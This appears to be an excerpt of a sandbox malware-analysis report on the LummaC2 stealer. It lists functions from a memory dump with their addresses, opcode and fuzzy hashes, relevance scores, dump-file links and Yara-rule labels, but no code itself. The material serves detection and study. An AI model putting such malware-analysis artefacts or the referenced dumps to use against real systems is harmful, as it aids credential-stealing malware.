Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e5480c954f944f2d77b15b2a4e6c9b00cb7734c87ff60cc96a3044481aca68b
Instruction ID: 537da55307064ff0e0fa72fd6b55fcdebe8e5e6c223554e5ee8f2f0012b04178
Opcode Fuzzy Hash: 4e5480c954f944f2d77b15b2a4e6c9b00cb7734c87ff60cc96a3044481aca68b
Instruction Fuzzy Hash: E622E53260C7598BC724DF19E8402ABB3E2FFD4309F29592DD9C6A7281D734E855CB82

Function 00F1D320 Relevance: .6, Instructions: 614COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ec159d8cf249c22bb9d26cd70716baae585f8cd932382a61d03a2a6692bd325
Instruction ID: 17dba441594c61654ca15ee3e6c101dd9f4589d5602105cd784a7e7f20599f3f
Opcode Fuzzy Hash: 7ec159d8cf249c22bb9d26cd70716baae585f8cd932382a61d03a2a6692bd325
Instruction Fuzzy Hash: EB02E332B08315CFC718CF28D8906AAB7E2FFCA314F1A85ADD48597361D631AD56DB81

Function 00EE3960 Relevance: .6, Instructions: 600COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0504d0b45978178a70d7330509a20889e2fcbbfe33b4a887435ebafa6d16cbce
Instruction ID: 9c107df38034f348bf4a9007b9f8432fffe3de1e31f0eb899ef2ac01cbc7fd20
Opcode Fuzzy Hash: 0504d0b45978178a70d7330509a20889e2fcbbfe33b4a887435ebafa6d16cbce
Instruction Fuzzy Hash: 0A322370914B988FC378CF2AC58456ABBF1BF85710B605A2ED697A7B90D336F944CB10

Function 00EFF700 Relevance: .6, Instructions: 589COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f81c0f704e422993dedf3473dcb533d955a8583692722d3c72c330f66c78af1c
Instruction ID: 7985197b6f361c52973c41952f603d3ac6b2225adeaf2b9bd22f6db6bf15d6e4
Opcode Fuzzy Hash: f81c0f704e422993dedf3473dcb533d955a8583692722d3c72c330f66c78af1c
Instruction Fuzzy Hash: E9525AB0618B818ED325CF3C9815797BFD5AB5A324F084A5DE0EE873D2C7B56001DB66

Function 00F1D3B0 Relevance: .6, Instructions: 579COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b60e078f6fb759a4e16a31e867165f7e842341275c9dfc6f3fb767b9e6d87fbe
Instruction ID: 29f66f614edacc2e076caf3cb8745c38ffb30adfb4b90e6bb9a119797bba42af
Opcode Fuzzy Hash: b60e078f6fb759a4e16a31e867165f7e842341275c9dfc6f3fb767b9e6d87fbe
Instruction Fuzzy Hash: 3BF1E232B08315CFC718CF28D8906AAB7E2FFCA314F1A85ADD88597351D631AD42DB91

Function 00F1D450 Relevance: .6, Instructions: 567COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bff89e6cadfff3c877f596058254b059df3b877709051d036924b5da2947d2d1
Instruction ID: af76ec6f2373882319416447b4321f50c1a2a66ec70a1a698b822716d6074b58
Opcode Fuzzy Hash: bff89e6cadfff3c877f596058254b059df3b877709051d036924b5da2947d2d1
Instruction Fuzzy Hash: 3DF10532B08315CFC718CF28D8906AAB7F2EFCA314F1A89ADD88597351D6359D42DB91

Function 00F17790 Relevance: .5, Instructions: 506COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08ffb9b1a60c722e0f314f918a21764ea1f78235d2512ef7685b408a702603be
Instruction ID: ad78a48e540a5eadafe0385f83f0eaa3e262a7fa8435515b242dbbb384104580
Opcode Fuzzy Hash: 08ffb9b1a60c722e0f314f918a21764ea1f78235d2512ef7685b408a702603be
Instruction Fuzzy Hash: BEE14632A0C3108FD714EF24C8916ABB7B2FBC5314F29892CE88997255DB35EC46E791

Function 00F0D110 Relevance: .5, Instructions: 480COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06cba8dce90fbc442b50fcd695481e9d3bc90c426d45927b570b1998feceea4c
Instruction ID: 2737b67f9df21a94cce44f79506db0115c525361724e204e52a03658b8006d87
Opcode Fuzzy Hash: 06cba8dce90fbc442b50fcd695481e9d3bc90c426d45927b570b1998feceea4c
Instruction Fuzzy Hash: 822213F0615B409FC3A9CF29E845BA3BBE9EB89714F50481EE0AECB351CB706501DB95

Function 00F020C0 Relevance: .4, Instructions: 416COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1873518c713eac3384daa27679c9f860808af44ab7147afd4c64f251899d7dea
Instruction ID: f65282e1d1d17fc3b6f52a83276a47f6daae294e2c23cc9ef50b52c7d730948f
Opcode Fuzzy Hash: 1873518c713eac3384daa27679c9f860808af44ab7147afd4c64f251899d7dea
Instruction Fuzzy Hash: B4A10671A083109BDB64DF24DC9667BB3E1EF91324F18992CE8C5972C2E738D945E362

Function 00EE5970 Relevance: .4, Instructions: 400COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6aba2e7236a2e9aceeb2528f5b0b9aaecc5cc82245fb39869df27382fd64ba8a
Instruction ID: 0873e6d04eb58eaf355faa328571474605a0b5422d213acfaaa7445f691cc519
Opcode Fuzzy Hash: 6aba2e7236a2e9aceeb2528f5b0b9aaecc5cc82245fb39869df27382fd64ba8a
Instruction Fuzzy Hash: B6E17A311087858FC720DF2AC880A6BBBE1EF99304F44982DE4D597752E675E948CB92

Function 00F06230 Relevance: .4, Instructions: 389COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2686c9a5bcdacc513298a09bdf5ef1fd4470b27f91f24050354bd74ea819117c
Instruction ID: 5682f4d9d86029e1e59871656589152eed5b2cd2b4fd3c098bf808072dacb7e1
Opcode Fuzzy Hash: 2686c9a5bcdacc513298a09bdf5ef1fd4470b27f91f24050354bd74ea819117c
Instruction Fuzzy Hash: 4CB15976A483118BDB18CE24D84267BB7E1EB95324F18852CE882DB3C1D635DC16F792

Function 00F01D10 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 928d80da278cb4408437d2ad6a83f61557881b1f342838e060f8ac39c64c4b1a
Instruction ID: 0309b625da19bb26764b3a38fd35b2ec38b831c720c53ed35bafd942c69bb361
Opcode Fuzzy Hash: 928d80da278cb4408437d2ad6a83f61557881b1f342838e060f8ac39c64c4b1a
Instruction Fuzzy Hash: B4A1D2B1A043018BD7249F24C892B6BB7A5FF94364F18852CF9898B3C1E774E905E766

Function 00EFD840 Relevance: .3, Instructions: 337COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 372c1c71f3ad481db53e1897747b1fa3781df20ca1de47d93cc6472462fd5c90
Instruction ID: f01cce9acc4c76fe5ce2656df5d98e7da39bc3f1d83f59cf050c4634828a2132
Opcode Fuzzy Hash: 372c1c71f3ad481db53e1897747b1fa3781df20ca1de47d93cc6472462fd5c90
Instruction Fuzzy Hash: 74B11676508309AFD7209F24CC41B6ABBE2FFC4318F154A2CF5A8A72A0D7729D45DB42

Function 00F1E1F0 Relevance: .3, Instructions: 329COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 65b99ce48f5cfaef3bb211f9b1529cedb854ff7728cacf7426db69307c28c36a
Instruction ID: aab6bacc67295e69fc8aa967e846fe91cb4741f2caea4c260619f48c6f26ef28
Opcode Fuzzy Hash: 65b99ce48f5cfaef3bb211f9b1529cedb854ff7728cacf7426db69307c28c36a
Instruction Fuzzy Hash: 4A91E575B043519FC724CF18D890AAAB7E2FFD8764F19892CE89587251DB34AC81EB81

Function 00F0DFC3 Relevance: .3, Instructions: 327COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31493c44b533b9f20175d5ccd182098e28b502746ab44497912dfc8d113f02ac
Instruction ID: 3a9db301fd6ba6b5a9b7ab486a05fbeecfb1380ce45fcc0cf8558608ee895fa7
Opcode Fuzzy Hash: 31493c44b533b9f20175d5ccd182098e28b502746ab44497912dfc8d113f02ac
Instruction Fuzzy Hash: 20D1D172608B814BD319CA3888913A7BFD29FD6324F19CA7DD4EB877D6D678A405C702

Function 00F1DEB0 Relevance: .3, Instructions: 319COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 94e6a2b8b7586ae7945b3f7725419c8e660d885d8c52024c1f401c587c24012a
Instruction ID: b7152102d86c87b75d4f9419f601de4560bb46416a2e780b1a92421457efb5c1
Opcode Fuzzy Hash: 94e6a2b8b7586ae7945b3f7725419c8e660d885d8c52024c1f401c587c24012a
Instruction Fuzzy Hash: 2B91E375A042159FD724CF18C890AAAB3E2FFD9760F15842CE8859B365DB30EC52EB81

Function 00F07A40 Relevance: .3, Instructions: 310COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18f10b6d7116259b2cc9c08f950be3603bdc4d36d8b85695dda29b909dfd8fda
Instruction ID: 72f1f7a40073e1e28fb9fa29dda234f1f09cae884b2520fa85e3877bd7796f41
Opcode Fuzzy Hash: 18f10b6d7116259b2cc9c08f950be3603bdc4d36d8b85695dda29b909dfd8fda
Instruction Fuzzy Hash: 62B12832E05645CFD714CF28D8A176DB7B3AF8A320F1982A9D4515B3E1CB35AD42EB40

Function 00EE61D0 Relevance: .3, Instructions: 303COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5140ca86dd5b4bcaba2cb1346e0d6ff8cb35f9844ba483e5f1b1bd21b4eb7be
Instruction ID: 97c9b4bd977167001188d0cf062ca9d5afc9495d934cfb10b4cf911af1259a8e
Opcode Fuzzy Hash: b5140ca86dd5b4bcaba2cb1346e0d6ff8cb35f9844ba483e5f1b1bd21b4eb7be
Instruction Fuzzy Hash: A9C18CB2A487858FC320CF29DC867ABB7F1BF85358F08492DD1D9D6242E778A155CB06

Function 00F08C46 Relevance: .3, Instructions: 285COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5580e96349c6cb0318cd9a91a2e2ff940fa8a6eac34fcf21e2a878b4ca1f52f
Instruction ID: 50e186a3ee84d9d25763a50e1ed8ec30fe3df72c005c339026c0eccb1b9b07f0
Opcode Fuzzy Hash: d5580e96349c6cb0318cd9a91a2e2ff940fa8a6eac34fcf21e2a878b4ca1f52f
Instruction Fuzzy Hash: 02A101B09087858FD724CF68C89266BB7E1AF95354F04492CF5D58B392E778D806EB42

Function 00F1DBB0 Relevance: .3, Instructions: 269COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d6a28d2d8e9e814ceccc4d66a4f5acba0ce10ecb93ec2ebac72220e466fe56a4
Instruction ID: d333a3f06c89466f697449c139ceaa91d7a5982b58369b5e70037286dfb51c9d
Opcode Fuzzy Hash: d6a28d2d8e9e814ceccc4d66a4f5acba0ce10ecb93ec2ebac72220e466fe56a4
Instruction Fuzzy Hash: 7B815976A052189BC7249F18D8806BBB3B3EFD8764F19C52CD8859B254EB30AD51E7C1

Function 00EFD560 Relevance: .3, Instructions: 267COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3059416b28473304b7e35c4a3b23d83cdd8829f7f6618989d927be229b5c3f87
Instruction ID: 716c4f9d4793cdd4a3b5b0a2f830e890416d7011d9b8311d228f479a285270e5
Opcode Fuzzy Hash: 3059416b28473304b7e35c4a3b23d83cdd8829f7f6618989d927be229b5c3f87
Instruction Fuzzy Hash: 1F914B72A082654FC7258E288C513AE7BE2EBC5324F19863DE8B99B3C1D7749C06D7C1

Function 00F07D94 Relevance: .3, Instructions: 252COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f74fce717fef92311262f8cc9b7f6a86e6a4f79462ed9f40a18f793582774413
Instruction ID: 5689cadcefa677a60c6da992d1810296044f679b3d0dc94563eefe8916f11332
Opcode Fuzzy Hash: f74fce717fef92311262f8cc9b7f6a86e6a4f79462ed9f40a18f793582774413
Instruction Fuzzy Hash: 2F9105B6E00619CFDB248F94D8517AEBBB1FF48314F19416CD5416B392D779A902EF80

Function 00F174F0 Relevance: .2, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0dc54ad5f07c8e697c1297b686083161e428545efcf16fa32698e6d9ae707fdc
Instruction ID: e43a03e4563420b7bb7a18b38ef6700d739fced5cba3f5a82a4f5bb98d129bdd
